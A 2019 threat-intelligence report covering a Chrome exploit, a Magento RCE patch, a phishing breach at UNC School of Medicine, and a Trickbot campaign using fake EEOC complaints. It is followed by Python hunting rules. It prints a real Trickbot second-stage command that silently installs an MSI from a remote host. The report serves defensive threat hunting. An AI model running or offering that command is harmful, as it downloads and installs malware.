Threat Report

Thursday November 14th 2019

We’re back with another edition of the usually weekly threat report. This week we’re highlighting two critical vulnerabilities, a case of business email compromise for a medical school, and a Trickbot campaign targeting U.S. government offices.

Chrome vulnerability with YouTube demo

If you haven’t updated Chrome recently, you might want to. In early November, a critical use-after-free vulnerability in Google Chrome (CVE-2019-13720) was disclosed. Earlier this week a proof-of-concept exploit for the vulnerability was posted on YouTube by Tony Stack.

The vulnerabilities have been patched in Chrome version 78.0.3904.87, but older versions are being actively exploited. Users on the forum have been discussing the vulnerability, which shows that many threat actors want to leverage it against out-of-date versions of Chrome.

On the YouTube post, user ironman, aka Tony Stack, shares the steps to exploit the Chrome vulnerability. You can get more details from Tony on and on GitHub.

Remote code execution vulnerability for Magento

E-commerce platform Magento warned its users to apply a security patch for a remote code execution vulnerability, tracked as CVE-2019-8144, affecting Magento 2.3 prior to 2.3.3 or 2.3.2-p.

The vulnerability could allow unauthenticated attackers to deliver malicious payloads to a merchant’s site and execute them. On October 8, 2019, Magento released a security update to address the vulnerability, but installations whose owners have not applied the update remain vulnerable. Users are advised to update to Magento Commerce 2.3.3 or apply the security-only patch 2.3.2-p2 to address the vulnerability.

In addition to applying security patches, Magento also recommends checking websites and servers for signs of compromise before upgrading.

Phishing attack leads to BEC at UNC School of Medicine

Around 3,716 individuals may have been affected by a phishing and BEC incident that resulted in a data breach at the University of North Carolina School of Medicine. Some School of Medicine students fell victim to an email phishing attack targeting their email accounts.

Between May 17, 2018, and June 18, 2018, an unauthorized third party gained access to several email accounts containing personal information of some patients, possibly related to treatment received at UNC.

These email accounts contained information such as patients’ names, dates of birth, demographic data such as addresses, health insurance information, health information, Social Security numbers, financial account information, and/or credit card information.

Notification letters to affected patients began going out on November 12, 2019. The university also offered limited monitoring and identity protection services to the affected individuals, which does not cover losses patients may already have suffered.

UNC School of Medicine is taking steps to prevent further BEC compromise by adding multi-factor authentication and enrolling employees in security awareness training. There has been no mention of whether UNC business practices will change to stop sensitive patient information from being shared via email. Business processes involving sensitive information should not be conducted over email.

Trickbot lures employees with sexual harassment complaints from the EEOC

Fake sexual harassment complaints from the U.S. Equal Employment Opportunity Commission (EEOC) are the latest lure used by attackers to disseminate the Trickbot banking Trojan onto the devices of unsuspecting employees of large companies.

Based on data available to Perch, this campaign is still very active, with a first sighting on November 3rd, 2019. Based on the customers being targeted, the campaign seems mostly geared towards the financial services, education, retail, and healthcare industries.

According to recent reports, the malware operators use information collected for each target to customize the phishing emails to look legitimate. The attackers use “Name_of_Victim – A grievance raised against you” subjects for each of the phishing emails to draw in the attention of their targets.

Additionally, the malicious attachments carrying the Trickbot payload have customized names in the format “Name_of_Victim – Harassment complaint letter (phone 111-222-3333).doc” to further entice the target into opening the attachment. Organizations should implement security monitoring processes to prevent, detect, and respond to phishing attacks. Enjoy some IoCs for your hunting pleasure.

IP Addresses

2nd Stage Download (through MSI)

msiexec /i http://ftpthedocgrp[.]com/backup.msi /q
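
As an added example (not part of Perch's report or tooling), the lure formats described above and the msiexec second-stage command can be turned into simple hunting logic. The mail and process-creation records below are constructed, not real telemetry; the field names are assumed.

```python
import re

# Constructed sample records (not real telemetry). Mail records carry a subject
# and attachment name; process records carry the image path and command line.
EMAIL_EVENTS = [
    {"subject": "Jane Doe – A grievance raised against you",
     "attachment": "Jane Doe – Harassment complaint letter (phone 111-222-3333).doc"},
    {"subject": "Q4 budget review", "attachment": "budget.xlsx"},
]
PROCESS_EVENTS = [
    {"image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec /i http://ftpthedocgrp[.]com/backup.msi /q"},
    {"image": "C:\\Windows\\System32\\msiexec.exe",
     "cmdline": "msiexec /i C:\\Temp\\vendor-agent.msi /qn"},
]

# Subject and attachment shapes from the report; a plain hyphen or an en dash is accepted,
# and .doc/.docm/.docx are all treated as the same lure.
SUBJECT_RE = re.compile(r".+\s[-–]\s*a grievance raised against you$", re.I)
ATTACH_RE = re.compile(
    r".+\s[-–]\s*harassment complaint letter \(phone [\d-]+\)\.doc[mx]?$", re.I)
# msiexec installing a package straight from a URL (defanged [.] tolerated, so the
# same rule works against the IoC as written and against live telemetry).
MSI_URL_RE = re.compile(r"msiexec(\.exe)?\s.*?/i\s+https?://\S+", re.I)


def scan_email(ev):
    """Return the detection names that fire on one mail record."""
    hits = []
    if SUBJECT_RE.search(ev.get("subject", "")):
        hits.append("trickbot_eeoc_subject")
    if ATTACH_RE.search(ev.get("attachment", "")):
        hits.append("trickbot_eeoc_attachment")
    return hits


def scan_process(ev):
    """Return the detection names that fire on one process-creation record."""
    image = ev.get("image", "").lower()
    if image.endswith("msiexec.exe") and MSI_URL_RE.search(ev.get("cmdline", "")):
        return ["msiexec_remote_install"]
    return []


def hunt(emails, procs):
    """Run both rule sets and return (detection, evidence) pairs for analyst review."""
    findings = [(n, ev["subject"]) for ev in emails for n in scan_email(ev)]
    findings += [(n, ev["cmdline"]) for ev in procs for n in scan_process(ev)]
    return findings
```

Running `hunt(EMAIL_EVENTS, PROCESS_EVENTS)` on the constructed records yields three findings: the lure subject, the lure attachment, and the remote MSI install; the local MSI install does not fire.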

Paul Scott